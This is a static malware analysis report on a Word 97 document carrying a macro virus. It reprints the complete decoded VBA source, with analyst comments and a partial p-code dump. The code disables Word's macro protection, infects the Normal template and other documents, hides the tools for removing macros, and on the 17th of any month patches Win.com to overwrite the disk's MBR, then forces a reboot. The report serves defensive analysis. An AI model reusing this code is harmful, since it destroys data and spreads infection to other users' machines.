Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73c7d94c99851ae7…

MALICIOUS

Office (OLE)

30.5 KB Created: 1997-01-29 21:37:00 (document-metadata timestamp; author-controlled, not a reliable compile date) Authoring application: Microsoft Word 8.0 (Word 97) First seen: 2012-06-14
MD5: 2126373a2e90c4391f6097c37be774cb SHA-1: 77b6086bc1f6430467eb4d071129965f6043c7ed SHA-256: 73c7d94c99851ae7eb80e0f3a5203a33271f150e15b1527bf6f2865a2c7f1a5c
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains a VBA AutoOpen macro in module ET_No1. The OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic also fired on the AutoOpen marker, but the recovered code is Word 97 VBA (Attribute/Declare syntax, Win32 imports), not WordBasic. Every time the document opens, the macro turns off Word's VirusProtection option, replaces any existing ET_No1 module in the Normal template with a copy of itself (infecting the global template), disables the Alt+F8 and Alt+F11 shortcuts, strips the Visual Basic toolbar and the Tools > Macro / Customize menu items, and marks the infection with a toolbar button captioned "ETKill"; once that marker is present it instead copies the module from Normal back into the active document, which is the propagation path. It is therefore a self-replicating macro virus, not a macro that removes itself from Normal. On the 17th of any month it additionally opens Win.com in the Windows directory for binary write (creating it if absent) and patches it in place at offsets 0 and 2560 with hardcoded bytes, then forces a reboot via ExitWindowsEx(6, 0) (EWX_REBOOT | EWX_FORCE). The 20 patch bytes decode as x86 code: a JMP at offset 0 whose target is offset 2560, where MOV AX,0301h / MOV BX,8000h / MOV CX,0001h / MOV DX,0080h / INT 13h is a BIOS write of one sector to cylinder 0, head 0, sector 1 of drive 80h — i.e. an overwrite of the first hard disk's MBR with whatever is at ES:8000h at the time the patched Win.com runs. That reading should be confirmed by emulating the patched loader; if confirmed, T1561.002 (Disk Structure Wipe) applies in addition to T1059.005.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the marker is corroborating only: a full VBA project was recovered (macros.bas below, module ET_No1), so the executable surface is VBA and OLE_VBA_AUTOOPEN is the primary finding.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9765 bytes
SHA-256: 16780812123d4b0e81f39aa0d83d7eea11fcb10e568d1e435d4cdddd5b9af9d9
Preview script
First 1,000 lines of the extracted script
' Module 1 of 2: the document's ThisDocument class module.
' Only module attributes were recovered here (the stream is 903 bytes per the
' p-code dump below); no procedures, so no executable behavior lives in this module.
' VB_Base = "1Normal.ThisDocument" together with VB_TemplateDerived = True
' indicates the document class is derived from the Normal template.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module 2 of 2: the malicious standard module. "ET_No1" is also the project-item
' name used by the Organizer copy/delete calls in AutoOpen to move this module
' between the active document and the Normal template, so it doubles as the
' infection marker inside the VBA project.
Attribute VB_Name = "ET_No1"
' Win32 import: locates the Windows directory so Win.com can be patched by absolute path.
' NOTE(review): the p-code dump further down lists this Declare without the Alias clause;
' the difference is probably a dump-formatting artifact, but a source/p-code mismatch is
' worth confirming against the raw module stream before relying on either listing.
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' Leftover procedure attribute naming a "ProVirus.Virus" project - a useful pivot
' string for hunting related samples; it is not by itself a family attribution.
Attribute GetWindowsDirectory.VB_ProcData.VB_Invoke_Func = "ProVirus.Virus.AutoOpen"
' Win32 import: used to force a reboot after the Win.com patch (see AutoOpen).
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
'
' Auto-executes when the document is opened. Two stages:
'   1. Date-triggered destructive payload (17th of any month): patches Win.com in
'      the Windows directory with raw x86 bytes and forces a reboot.
'   2. Unconditional replication: infects the Normal template (or, if Normal is
'      already infected, re-infects the current document) and removes the Word UI
'      an analyst would use to inspect or remove macros.
' No parameters, no return value. All errors are swallowed by On Error Resume Next,
' so partial failures (missing Win.com, missing toolbar, read-only Normal) are silent.
Dim DD As Byte

    On Error Resume Next
    
    ' Turns off Word's macro virus protection option (the macro-warning prompt).
    Options.VirusProtection = False
    
    ' Payload trigger: day-of-month 17, any month, any year.
    If Day(Date) = 17 Then
        ' 3 bytes written at offset 0: E9 FD 09 = JMP rel16; target = 3 + 0x09FD = 0xA00 = 2560,
        ' i.e. control is redirected to the second patch below.
        Txt1 = "E9FD09"
        ' 17 bytes written at offset 2560. Decoded: MOV AX,0301h (AH=03 write, AL=1 sector);
        ' MOV BX,8000h (buffer ES:BX); MOV CX,0001h (cyl 0, sector 1); MOV DX,0080h (head 0,
        ' drive 80h = first hard disk); INT 13h; JMP rel16 +0x04FC. Consistent with overwriting
        ' the MBR with whatever is at ES:8000h when the patched Win.com runs at boot.
        ' NOTE(review): decoded by hand from the literal - confirm by emulating the patched file.
        Txt2 = "B80103BB0080B90100BA8000CD13E9FC04"
        windir$ = String(144, " ")
        l = GetWindowsDirectory(windir$, 144)
        windir = Left(windir$, l)
        ' Binary mode does not truncate: an existing Win.com is patched in place;
        ' if the file does not exist VBA creates it.
        Open windir + "\Win.com" For Binary Access Write Lock Read As #1
            For i = 1 To 3
                ' Relies on VBA's implicit conversion of an "&Hxx" string to a number.
                DD = "&H" + Mid(Txt1, 2 * i - 1, 2)
                ' No position argument: writes at the current position, starting at byte 1 (offset 0).
                Put #1, , DD
            Next i
            For i = 1 To 17
                DD = "&H" + Mid(Txt2, 2 * i - 1, 2)
                ' Binary-mode positions are 1-based: 2561..2577, i.e. zero-based offsets 2560..2576.
                Put #1, 2560 + i, DD
            Next i
        Close #1
        ' uFlags 6 = EWX_REBOOT (2) | EWX_FORCE (4): immediate forced reboot so the
        ' patched loader runs on the next boot.
        Call ExitWindowsEx(6, 0)
    End If
       
       ' Full paths of the current document and of the global Normal template.
       DocName = ActiveDocument.Path + "\" + ActiveDocument.Name
       DotName = NormalTemplate.Path + "\" + NormalTemplate.Name
    ' Infection marker: the caption of the first control on the "Visual Basic" toolbar.
    ' Absent marker -> Normal is not yet infected -> infect it and hide the UI.
    If CommandBars("Visual Basic").Controls(1).Caption <> "ETKill" Then
       ' Replace (delete, then copy) the ET_No1 module in Normal with this document's copy.
       Application.OrganizerDelete Source:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
       Application.OrganizerCopy Source:=DocName, Destination:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
       ' Remove Tools > Macro / Customize menu items (see DelTools; it re-arms itself every second).
       DelTools
       ' Disable Alt+F8 and Alt+F11 in Normal - Word's default shortcuts for the
       ' Macros dialog and the Visual Basic Editor.
       CustomizationContext = NormalTemplate
       FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
       CustomizationContext = NormalTemplate
       FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
       ' Count is evaluated once; deleting Controls(1) each iteration empties the toolbar.
       For k = 1 To CommandBars("Visual Basic").Controls.Count
            CommandBars("Visual Basic").Controls(1).Delete
       Next k
       ' Plant the marker: a single button captioned "ETKill" on the emptied toolbar.
       Set MyFlag = CommandBars("Visual Basic").Controls.Add(Type:=msoControlButton, ID:=752)
       MyFlag.FaceId = 30
       CommandBars("Visual Basic").Controls(1).Caption = "ETKill"
       ' Persist the infected Normal template (and the key/toolbar customizations).
       NormalTemplate.Save
    Else
       ' Marker present -> Normal already infected -> propagate from Normal into this document.
       Application.OrganizerCopy Source:=DotName, Destination:=DocName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
       ActiveDocument.Save
    End If
End Sub

Sub DelTools()
' Removes two items from the Tools menu by caption, then re-schedules itself to
' run again one second later for as long as Word is open.
' The captions are GBK-encoded Simplified Chinese shown here as mojibake:
' "ºê(&M)" decodes to the Macro menu item and "×Ô¶¨Òå(&C)..." to the Customize
' menu item. The comparisons only match on a Chinese-locale Word; on other
' locales nothing is deleted and the routine just keeps re-arming.
    ' Tools > Macro (Chinese caption).
    For i = 1 To CommandBars("Tools").Controls.Count
       If CommandBars("Tools").Controls(i).Caption = "ºê(&M)" Then
            CommandBars("Tools").Controls(i).Delete
            Exit For
       End If
    Next i
    ' Tools > Customize... (Chinese caption).
    For i = 1 To CommandBars("Tools").Controls.Count
       If CommandBars("Tools").Controls(i).Caption = "×Ô¶¨Òå(&C)..." Then
            CommandBars("Tools").Controls(i).Delete
            Exit For
       End If
    Next i
    ' Re-arm every second so the menu items stay hidden even if Word restores them.
    Application.OnTime When:=Now + TimeValue("00:0:01"), Name:="DelTools"
End Sub

' Processing file: /opt/analyzer/scan_staging/4fce7231d25c498ea3ffccacda3e2214.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/ET_No1 - 4814 bytes
' Line #0:
' 	FuncDefn (Private Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' 	FuncDefn (Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long)
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	Dim 
' 	VarDefn DD (As Byte)
' Line #5:
' Line #6:
' 	OnError (Resume Next) 
' Line #7:
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #9:
' Line #10:
' 	Ld Date 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0011 
' 	Eq 
' 	IfBlock 
' Line #11:
' 	LitStr 0x0006 "E9FD09"
' 	St Txt1 
' Line #12:
' 	LitStr 0x002
... (truncated)